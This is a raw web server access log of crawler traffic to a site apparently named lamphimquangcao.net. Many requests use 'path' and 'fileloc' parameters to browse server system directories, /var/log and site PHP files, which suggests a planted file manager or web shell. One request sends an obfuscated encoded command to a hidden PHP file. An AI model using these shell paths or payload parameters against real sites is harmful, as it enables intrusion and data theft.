34.196.114.170 - - [16/Nov/2025:00:02:38 +0000] "GET /our-works/?path=//sys/module/x_tables/holders/ip_tables HTTP/1.0" 200 3525 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:02:39 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory3/node0/memory7 HTTP/1.0" 200 3608 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:02:39 +0000] "GET /q-~4uFryHAj3Cj3RXSVjVbJkLQiWfhAhQI49741/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:02:40 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory0/node0/memory1 HTTP/1.0" 200 3604 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:02:41 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory0/node0/memory6 HTTP/1.0" 200 3607 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:02:41 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/memory15/subsystem HTTP/1.0" 200 3424 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
136.243.153.17 - - [16/Nov/2025:00:02:41 +0000] "GET /our-works/viral-clip/upper-400sc/?path=%2F%2Flib32 HTTP/1.0" 200 2862 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
74.7.227.215 - - [16/Nov/2025:00:02:42 +0000] "GET /q-~73hyCcwvOVtJeRjxdTrPAPzfAep0aFwz24158/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
100.28.133.214 - - [16/Nov/2025:00:02:42 +0000] "GET /our-works/tvc-kimino/?path=//proc/thread-self/root/sys/bus/workqueue/devices/writeback/subsystem/drivers HTTP/1.0" 200 2963 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:02:42 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/memory11/subsystem HTTP/1.0" 200 3424 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:02:43 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/memory10/subsystem HTTP/1.0" 200 3422 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:02:44 +0000] "GET /q-~90GgTiXz6p3AOrBNfvKEUEpvvSXUJbMY4569/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:02:44 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/memory13/subsystem HTTP/1.0" 200 3420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:02:45 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/memory14/subsystem HTTP/1.0" 200 3424 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:02:45 +0000] "GET /q-~169PGlOgEWkzycDTnUFBysXoGByaXUWWb46170/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:02:46 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/memory12/subsystem HTTP/1.0" 200 3424 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:02:46 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory6/subsystem/devices/memory5/node0 HTTP/1.0" 200 4198 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:02:47 +0000] "GET /q-~184PxhDoUXMEuWdUVknFPeVzcEFkeygaK17053/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
98.83.72.38 - - [16/Nov/2025:00:02:47 +0000] "GET /our-works/phim-viral-ila/?path=//sys/class/input/event0/subsystem/input3/subsystem/input0/id HTTP/1.0" 200 3328 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:02:48 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/cpu1/cache/index3 HTTP/1.0" 200 3670 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:02:48 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/cpu1/cache/index2 HTTP/1.0" 200 3671 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:02:49 +0000] "GET /q-~89sKmBENVwHZRa2YbbFdQYxaDpSSTYbt30758/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:02:49 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/cpu0/cache/index3 HTTP/1.0" 200 3669 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:02:50 +0000] "GET /q-~27VgTaEBPSmFnkxqZAsgDzjluatKEs5L23480/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
3.220.70.171 - - [16/Nov/2025:00:02:50 +0000] "GET /our-works/tvc-calci/?path=//sys/bus/virtio/drivers/virtio_net/virtio0/driver/virtio0/subsystem/drivers HTTP/1.0" 200 3360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:02:51 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/cpu1/cache/index0 HTTP/1.0" 200 3669 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:02:51 +0000] "GET /q-~74zUjESeTjSyu6arQVmEWKviIAHtQCWG48563/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:02:52 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/cpu1/cache/index1 HTTP/1.0" 200 3668 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:02:52 +0000] "GET /q-~30rUJSSB1WswPTYuDtGPxXzqKRhtwZKj48675/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:02:53 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/cpu0/cache/index2 HTTP/1.0" 200 3670 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:02:54 +0000] "GET /q-~18CCxByt5fzarbqEYA4ilmuBCTprMKWQ7253/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:02:54 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/cpu0/cache/index1 HTTP/1.0" 200 3670 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:02:55 +0000] "GET /q-~66OSnYgOmfMctro4xLVBezb4TeLsGRpA6219/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
3.221.244.28 - - [16/Nov/2025:00:02:55 +0000] "GET /our-works/tvc-lapatie-2/?path=//sys/class/misc/kvm/subsystem/vfio/subsystem/snapshot/subsystem/device-mapper HTTP/1.0" 200 3371 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:02:56 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory5/node0/subsystem/drivers HTTP/1.0" 200 2975 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
136.243.153.17 - - [16/Nov/2025:00:02:56 +0000] "GET /our-works/phim-viral-ila/?path=%2Fvar%2Flog HTTP/1.0" 200 6130 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
74.7.227.215 - - [16/Nov/2025:00:02:57 +0000] "GET /q-~4xtTUsMkdFHbXIkWel64ZeXKAjiKUaZ33455/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:02:57 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory3/node0/subsystem/drivers HTTP/1.0" 200 2975 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.79.248.20 - - [16/Nov/2025:00:00:36 +0000] "GET /wp-includes/js/tinymce/themes/inlite/inlite/index.php?ARRAY=7o2230223n313736333235343833352p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736333235313233352q6635643233346566326166373834316538303332636339613335363434623935222p2232223n223563306234623137373836386638613030313830313630386261383031383135222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q33352q35332q36372q38302q38332q3231227q HTTP/1.0" 200 211 "-" "-"
74.7.227.215 - - [16/Nov/2025:00:02:58 +0000] "GET /q-~228jOpsBqZFnbopxqkDw9hs6uWWQEFImX243/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:02:59 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/subsystem/drivers/processor HTTP/1.0" 200 3432 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
34.231.118.144 - - [16/Nov/2025:00:02:59 +0000] "GET /our-works/tvc-jokky/?path=//sys/class/input/input0/subsystem/event0/subsystem/input0/device HTTP/1.0" 200 3499 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:02:59 +0000] "GET /q-~117OPkbWsXShZrXGxIQFjYwBKCaqqPWUZ30720/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:02:59 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory0/node0/subsystem/drivers HTTP/1.0" 200 2974 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:00 +0000] "GET /q-~62kBrkgQiMajiyEXXTvWJnDYV5Wmg0KL6989/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
69.197.179.242 - - [16/Nov/2025:00:01:02 +0000] "GET /wp-content/pladfa46/index.php?id=383884 HTTP/1.0" 200 166 "https://lamphimquangcao.net/wp-content/pladfa46/index.php?id=383884" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.227.8 - - [16/Nov/2025:00:03:00 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory7/node0/subsystem/drivers HTTP/1.0" 200 2975 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:01 +0000] "GET /q-~13NZMYB7ESekWlTuYw9kqiCDIMYiXdwb6314/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:01 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/driver/cpu0/subsystem/drivers HTTP/1.0" 200 3245 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:01 +0000] "GET /q-~96kCOJ8kmbjOxcUpI0NUeiNDtcdzTKxf8799/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:02 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/driver/cpu0/subsystem/drivers HTTP/1.0" 200 3249 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
217.113.194.39 - - [16/Nov/2025:00:03:02 +0000] "GET /our-works/tvc-calci/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-includes/general-template.php&path=/var/www/lamphim/data/www/lamphimquangcao.net/wp-includes HTTP/1.0" 200 40739 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
50.16.216.166 - - [16/Nov/2025:00:03:02 +0000] "GET /our-works/tvc-sjc/?path=//sys/class/input/mice/subsystem/input1/event1/subsystem/event0 HTTP/1.0" 200 3387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:03:02 +0000] "GET /q-~280LhWAIMYS7hEnMopkyCx7hHiMHkYPBu757/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:02 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/driver/cpu1/subsystem/drivers HTTP/1.0" 200 3245 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:03 +0000] "GET /q-~67X4sEeeEtYwdtr5SLKLDpPokxPTMIiv9592/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:03 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory8/node0/subsystem/drivers HTTP/1.0" 200 2975 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
66.249.66.165 - - [16/Nov/2025:00:03:03 +0000] "GET /sitemap-detail-2005.xml HTTP/1.0" 200 4453 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.215 - - [16/Nov/2025:00:03:04 +0000] "GET /q-~48HqPdzCxXzyBbSHwAgSQ7XMaqofFaIc40525/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:04 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory2/node0/subsystem/drivers HTTP/1.0" 200 2974 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
57.141.2.90 - - [16/Nov/2025:00:03:04 +0000] "GET /?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-mail.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 22109 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.215 - - [16/Nov/2025:00:03:05 +0000] "GET /q-~249RaXnVCbBBTqFzmLDAUwTyqIsAHixaS12190/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:05 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/driver/cpu1/subsystem/drivers HTTP/1.0" 200 3249 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:05 +0000] "GET /q-~10kytgVTZTCVxdGm1wjnTWNJME9yiYyM9259/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:06 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/subsystem/drivers/processor HTTP/1.0" 200 3432 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:06 +0000] "GET /q-~6ONgvGNODpuPaCWuVUar0zo8MaXLWnI21519/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:07 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/subsystem/drivers/processor/cpu1 HTTP/1.0" 200 3720 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
52.203.65.83 - - [16/Nov/2025:00:03:07 +0000] "GET /our-works/tvc-kimino/?path=//sys/class/misc/loop-control/subsystem/snapshot/subsystem/mcelog/subsystem/hpet HTTP/1.0" 200 3373 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
207.46.13.78 - - [16/Nov/2025:00:03:07 +0000] "GET /?products=968378198 HTTP/1.0" 200 180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:03:07 +0000] "GET /q-~37mBftMpQKNQr6bdvsHXKBTFMoUmpSdh46192/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:08 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/subsystem/drivers/processor/cpu0 HTTP/1.0" 200 3679 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
57.141.2.20 - - [16/Nov/2025:00:03:08 +0000] "GET /?products=720868 HTTP/1.0" 200 73703 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.215 - - [16/Nov/2025:00:03:08 +0000] "GET /q-~3xijXCNFUxba38XFfIfRWIjRPyXxZwD27270/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:08 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/driver/cpu0/subsystem/drivers/processor HTTP/1.0" 200 3448 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:09 +0000] "GET /q-~14vPSJZjbeuxdLdMSw1BLO1CWdHnIyBb6189/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:09 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory9/node0 HTTP/1.0" 200 4161 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
136.243.153.17 - - [16/Nov/2025:00:03:09 +0000] "GET /our-works/viral-clip/upper-400sc/?path=%2F%2Flib64 HTTP/1.0" 200 3154 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
74.7.227.215 - - [16/Nov/2025:00:03:10 +0000] "GET /q-~82FdzGbse4YevimxVYvMHuoQFCMxfNtk21993/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:03:10 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory9/power HTTP/1.0" 200 3571 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:03:10 +0000] "GET /q-~15SYOzjoziXH8WssKB0kSjjxDxvtKfiI9170/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
100.24.167.60 - - [16/Nov/2025:00:03:11 +0000] "GET /our-works/tvc-calci/?path=//sys/bus/platform/drivers/reg-dummy/reg-dummy/subsystem/devices/reg-dummy/driver HTTP/1.0" 200 3364 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
